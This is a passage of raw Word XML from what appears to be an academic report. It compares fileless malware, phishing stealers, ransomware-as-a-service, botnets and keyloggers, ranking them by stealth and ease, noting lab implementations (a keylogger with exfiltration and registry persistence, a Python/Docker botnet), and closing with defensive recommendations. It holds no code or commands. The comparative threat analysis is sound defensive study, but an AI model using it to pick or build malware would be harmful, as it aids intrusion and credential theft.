            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1025D40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lastRenderedPageBreak/>
              <w:t>Phishing Credential Stealer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="164493F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5FEC7E9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Medium-High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1831" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0EC1FC6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Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="42FC5A60"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623EAB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Phishing kits, HTML/PHP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="05B82420" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="1260"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="683D295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Ransomware-as-a-Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0D68426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3C93C8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831" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0A247E6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3511400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2185" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="71D14E5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Darknet tools, malware builders</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="268E6D39" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="945"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="044E871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Botnet Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="53A232CF"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126" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="10840FC9"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355E4AA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7D6341E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3E36B0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Flask, Docker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0098508D" w:rsidRPr="0098508D" w14:paraId="5DEA1A16" w14:textId="77777777" w:rsidTr="0098508D">
        <w:trPr>
          <w:trHeight w:val="945"/>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1563" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4100F09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Keylogger Malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1169" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5C1A6BE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CAA6CB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831" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="31195C4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Easy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1193" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34F5173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398928A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pynput, Flask</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40222DBF" w14:textId="50FA291C" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A41DC0A" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Interpretation of Results</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA35BCD" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">From a stealth perspective, </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>fileless malware</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most difficult to detect and mitigate. Its use of memory-only execution makes traditional antivirus solutions ineffective. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing stealers</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>keyloggers</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> require less technical effort and remain widely used, especially in credential harvesting and surveillance campaigns. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>RaaS</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">, while high in impact, is more visible and attracts attention from law enforcement. </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Botnets</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> sit in the middle—less flashy but incredibly versatile in long-term attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174954D2" w14:textId="10FFBE69" w:rsidR="002926C7" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Each technique reflects a different stage or goal of cyber intrusion: phishing and keyloggers excel in initial access; fileless malware and botnets maintain persistence; RaaS delivers the final blow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EE35FA" w14:textId="06603829" w:rsidR="00612745" w:rsidRPr="00BF4801" w:rsidRDefault="00612745" w:rsidP="00BF4801">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="13" w:name="_Toc194070988"/>
      <w:r w:rsidRPr="00BF4801">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="215E99" w:themeColor="text2" w:themeTint="BF"/>
          <w:sz w:val="34"/>
          <w:szCs w:val="34"/>
        </w:rPr>
        <w:t>5. Evaluation &amp; Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="749997BA" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Evaluating these five malware developments reveals how different strategies cater to different attack goals. Some are built for stealth, others for maximum damage, and some for scalability. By comparing both the academic findings and live implementations, clearer patterns emerge about which malware techniques are most dangerous and why.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435EA797" w14:textId="3D4844D1" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Fileless Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215030C9" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Fileless malware consistently emerges as the most adversarial technique among the five. It is not only difficult to detect but also very effective in gaining persistent access without leaving traces. In both research and the lab experiment, it operated entirely in memory, avoiding logs and traditional detection mechanisms. This method is ideal for attackers who need long-term, covert access to a target. The fact that even advanced antivirus software missed such activity during testing confirms its position as a high-threat vector.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6C5C33" w14:textId="43C03530" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Phishing Credential Stealers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0419C774" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Phishing is arguably the most accessible method for attackers. It requires little technical knowledge but continues to succeed because it targets people rather than machines. The literature confirmed that even trained users fall victim to realistic fake login pages, especially when simple trust indicators like HTTPS are present. However, phishing relies on user action, and as security awareness improves, its effectiveness could decrease. Nonetheless, when combined with tools like keyloggers or ransomware, phishing becomes a highly efficient entry point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C056615" w14:textId="59404EB3" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Ransomware-as-a-Service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262A35A2" w14:textId="75D54153" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>RaaS represents a shift in cybercrime—from isolated malware developers to organi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed services that anyone can use. Its structure is robust, with affiliate programs, dashboards, and customi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>able payloads. However, its high visibility and legal implications make it difficult to replicate ethically in lab environments. Despite this, the academic evidence shows that RaaS has caused more financial damage than any other category in this report. Detection strategies focus more on infrastructure disruption than stopping the payload itself, since encryption is usually irreversible once deployed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C584106" w14:textId="23F83C30" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Botnet Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C34D5C" w14:textId="2A8B3A17" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>Botnets are powerful due to their versatility. Whether used for data theft, surveillance, or DDoS, they allow attackers to control infected machines over time. The lab simulation showed how easily a basic botnet could be built using Python scripts and containers. Real-world botnets like Mirai and Emotet are more advanced, often using encrypted traffic and peer-to-peer communication to avoid takedowns. The academic research emphasi</w:t>
      </w:r>
      <w:r w:rsidR="00293279">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ed that spotting botnets requires ongoing traffic monitoring, as static tools rarely detect them early.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B9584" w14:textId="2E487257" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Keylogger Malware</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="507B7A52" w14:textId="609409E3" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">The keylogger implementation proved that even a basic script could be transformed into an effective surveillance tool when paired with real-time exfiltration and persistence features. The experiment mirrored </w:t>
      </w:r>
      <w:r w:rsidR="00BF4801" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behaviours</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> described in research, particularly encrypted log transfer, registry-based startup, and silent execution. Keyloggers are not particularly damaging on their own, but they serve as valuable tools for gathering credentials or monitoring systems silently over time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D721F31" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>To counter these threats effectively, defenders must move away from signature-based tools and toward more dynamic, context-aware detection methods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E234D73" w14:textId="6584612F" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>1. Deploy</w:t>
      </w:r>
      <w:r w:rsidR="00FA5998">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Behavior-Based Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Solutions that detect unusual memory usage, PowerShell activity, or fileless persistence mechanisms are essential. Fileless malware is nearly invisible to traditional scans but can be flagged by </w:t>
      </w:r>
      <w:r w:rsidR="00BF4801" w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>behavioural</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint protection platforms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5F2CE3" w14:textId="2039891E" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>2. Focus</w:t>
      </w:r>
      <w:r w:rsidR="00FA5998">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> on Email and Browser Security:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Most phishing attacks still rely on deceptive links and fake interfaces. Email filtering, real-time </w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>URL analysis, and browser-level interventions (e.g., warning overlays or domain scoring) can reduce user exposure.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D49E0E5" w14:textId="77777777" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3. Threat Intelligence and Darknet Monitoring:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t>To disrupt RaaS and botnet infrastructure, defenders must monitor affiliate recruitment forums, leaked ransomware configurations, and Bitcoin wallet behavior. These insights can be used to identify patterns before attacks are launched.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4645A8A1" w14:textId="01FE0345" w:rsidR="00612745" w:rsidRPr="008217DA" w:rsidRDefault="00612745" w:rsidP="00612745">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. Simulat</w:t>
      </w:r>
      <w:r w:rsidR="00B76E16">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Attacks in Safe Environments:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t>Organi</w:t>
      </w:r>
      <w:r w:rsidR="004C2596">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:t>ations should regularly simulate phishing, keylogger, and botnet attacks in isolated labs to better understand how threats evolve. Tools like Docker, PyInstaller, and Metasploit allow safe experimentation and defensive tuning.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073915D" w14:textId="62A17A20" w:rsidR="00C20576" w:rsidRDefault="00612745" w:rsidP="002926C7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Educat</w:t>
      </w:r>
      <w:r w:rsidR="00B76E16">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Beyond the Basics:</w:t>
      </w:r>
      <w:r w:rsidRPr="008217DA">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
        </w:rPr>
        <w:br/>
        <w:t>Phishing continues to work because users often rely on surface-level trust indicators. Awareness campaigns must teach users how to inspect URLs, understand certificate misuse, and question suspicious communication—even if it looks familiar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26286A97" w14:textId="2D7010B1" w:rsidR="00C47A74" w:rsidRDefault="00C47A74" w:rsidP="002926C7">
      <w:pPr>
